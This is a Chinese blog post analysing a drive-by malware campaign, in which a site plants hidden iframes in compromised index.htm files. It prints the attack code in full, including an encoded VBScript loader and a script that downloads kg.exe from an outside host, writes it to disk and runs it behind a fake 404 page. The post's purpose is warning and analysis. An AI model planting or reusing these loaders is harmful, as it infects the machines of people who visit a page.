• 请大家警惕这个散播木马的网站 www.zzyqr.com,本文简要地分析了它通过网页的传播方式


    经过我的观察推测此网站通过工具扫描网站服务器上是否有可以修改源文件的安全漏洞,如果有再找出所有的index.htm文件,然后在文件的最后一行加上一个iframe签入它网站上面植入木马的页面。
    iframe标签的代码如下(文中将散播木马的网站域名:“www.zzyqr.com”写成“www.xxx.com”):
    <iframe src=http://www.xxx.com/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
    我们可以用flashget下载它签入页面中的源文件,代码如下:

    <script>
    <!--
    document.write(unescape(
    "%3Chead%3E%3Ctitle%3Exh_New%20Year///%3C/title%3E%0D%0A%3Cscript%20language%3DVBScript%3E%0D%0Aon%20error%20resume%20next%0D%0Aset%20zero%20%3D%20document.createElement%28%22ob%22%20%26%20%22ject%22%29%0D%0Azero.setAttribute%20%22cl%22%20%26%20%22assid%22%2C%20%22cl%22%20%26%20%22sid%3ABD%22%20%26%20%2296C556-65A3-11D0-983A-00C04%22%20%26%20%22FC29E36%22%0D%0Astr3%20%3D%20%22Ad%22%20%26%20%22odb.St%22%20%26%20%22ream%22%0D%0Aset%20F%20%3D%20zero.createobject%28str3%2C%22%22%29%0D%0Aif%20Not%20Err.Number%20%3D%200%20then%0D%0Aerr.clear%0D%0Adocument.write%28%22%3Ci%22+%22frame%20style%3D%27display%3Anone%3B%27%20src%3D2007.htm%20width%3D1%20height%3D1%20frameborder%3D0%3E%3C/i%22+%22frame%3E%22%29%0D%0Aelse%0D%0Adocument.write%28%22%3Ci%22+%22frame%20style%3D%27display%3Anone%3B%27%20src%3DxiaoH.htm%20width%3D1%20height%3D1%20frameborder%3D0%3E%3C/i%22+%22frame%3E%22%29%0D%0Aend%20if%0D%0A%3C/script%3E%0D%0A%3C/head%3E%0D%0A%3C/html%3E%0D%0A%0D%0A%0D%0A"));
    //-->
    </script>

    它将js代码简单的乱化了一下,但是可以看出来使用document.write向页面上面写东西,我们改成alert,看一下其真实代码:

    它用js向页面上面写了一段vsscript代码,在vsscript代码中试图创建一个object,如果创建出错的话,会用iframe签入另外一个页面2007.htm,否则就用iframe签入xiaoH.htm文件,下面我们下载这两个文件,分别分析它的意图。
    2007.htm文件中的代码如下:

    <script language="Javascript">
    function Get(){
    var Then = new Date() 
    Then.setTime(Then.getTime() 
    + 24*60*60*1000)
    var cookieString = new String(document.cookie)
    var cookieHeader = "Cookie1=" 
    var beginPosition = cookieString.indexOf(cookieHeader)
    if (beginPosition != -1)
    }
     else 
    { document.cookie = "Cookie1=POPWIN;expires="+ Then.toGMTString() 
    inject 
    = "<iframe style='display:none;' src=xiao.htm width=1 height=1 frameborder=0></iframe>"
    setTimeout(
    "document.write(inject)"5000 );
    }

    }
    Get();
    </script>

    这个文件中的代码没有经过任何乱化,这段代码首先写入一个一天之后过期的cookie,然后有签入了另外一个页面xiao.htm
    xiao.htm文件中的代码如下:

    xiao.htm

    通过上面的代码我们可以分析得到,此文件又是用js写了一些东西,然后居然要显示一个404未找到的标题来蒙骗大家,让我们看看他的js到底写了一些什么东西,看下图。

    我们可以分析出来这段代码得最终目的是要在页面上面写一个object:VMLRender,从网上查到,此木马正是利用了VMLRender中的漏洞。也就是说到这一步,如果我们的系统没有打补丁的,如果一切正常的话可能木马已经被安装了。

    以上分析是第一个病毒页面执行出错的步骤,如果不出错,就会跳到另外一个页面xiaoh.htm,我们可以用flashget下载得到xiaoH.htm中的内容:

    <script language="VBScript">
    On Error Resume Next
    QnxyX
    ="http://www.rwvwv.com/mc/kg.exe"
    Set RJURL = document.createElement("object")
    ccc
    ="clsid:BD96":lll="C556-65":sss="A3-11D":iii="0-983A-00C":ddd="04FC29E36":xxx="Microsoft.X":mmm="MLHTTp"
    RJURL.SetAttribute 
    "classid", ccc&lll&sss&iii&ddd
    OOBnPl
    =xxx&mmm
    Set MKHbx = RJURL.CreateObject(OOBnPl,"")
    MKHbx.Open 
    "GET", QnxyX, False
    MKHbx.Send
    MQWLa
    ="~I7PRUGI1VAC.CoM"
    SEiDu
    ="~V5SFDYCLNTK.VbS"
    XpTvd
    ="~V5SFDYCLNTK.VbS"
    SS
    ="Scripting."
    cc
    ="FileSyst"
    rr
    ="emObject"
    Set Kpzwb = RJURL.createobject(SS&cc&rr,"")
    Set SrHOx = Kpzwb.GetSpecialFolder(2)
    MQWLa
    =Kpzwb.BuildPath(SrHOx,MQWLa)
    SEiDu
    =Kpzwb.BuildPath(SrHOx,SEiDu)
    RR
    ="Adod"
    NN
    ="b.stream"
    UoNfL
    =RR&NN
    Set HSREb = RJURL.createobject(UoNfL,"")
    HSREb.type
    =1
    HSREb.Open
    HSREb.Write MKHbx.ResponseBody
    HSREb.Savetofile MQWLa,
    2
    HSREb.Close
    HSREb.Type
    =2
    HSREb.Open
    HSREb.WriteText  
    "Set Shell = CreateObject(""Wscript.Shell"")"&vbCrLf&"Shell.Run ("""&MQWLa&""")"&vbCrLf&"Set Shell = Nothing"
    HSREb.Savetofile SEiDu,
    2
    HSREb.Savetofile 
    "c:\\NTDETECT.EXE",2
    HSREb.Close
    WSjog
    ="Shell.Applica"
    Set Run = RJURL.createobject(WSjog&"tion","")
    Run.ShellExecute SEiDu,
    "","","Open",0
    </script></html><script type="text/jscript">function init() {document.writeln("<HEAD><TITLE>404 Not Found<\/TITLE><\/HEAD><BODY>");
    document.writeln(
    "<H1>Not Found<\/H1>The requested URL \/codebase\/dff was not found on this server.<P>");
    document.writeln(
    "<P>Additionally, a 404 Not Found");
    document.writeln(
    "error was encountered while trying to use an ErrorDocument to handle the request.");
    document.writeln(
    "<\/BODY>");}
    window.onload = init;
    </script>

    病毒脚本在上面的页面中创建了一个对象,然后从中毒的机器中取到了一些数据,然后发送到目标机器。还存了一个文件:c:\NTDETECT.EXE.最后又伪装了一下自己,给用户显示一个404未找到的提示信息。

    后记:
    制造病毒的人是希望通过病毒的传播给自己带去财富,熊猫刚刚被捕,又有人顶风作案,实在是.......。

  • 相关阅读:
    Linux中逻辑卷的快照与还原
    Linux 中磁盘阵列RAID10损坏以及修复
    Linux 中磁盘阵列RAID10配置
    Linux 中磁盘容量配额
    Centos7VMware虚拟机最小化安装后,安装Tenda U12 USB无线网卡驱动
    安装vmware-tools遇the path "" is not valid path to the gcc binary和the path "" is not a valid path to the 3.10.0-327.e17.x86_64 kernel headers问题解决
    /etc/postfix下 main.cf 配置文件详解
    Linux安装配置vsftp搭建FTP的详细配置
    Linux中ftp的常用命令
    javascript深入理解js闭包
  • 原文地址:https://www.cnblogs.com/yukaizhao/p/kill_muma.html
Copyright © 2020-2023  润新知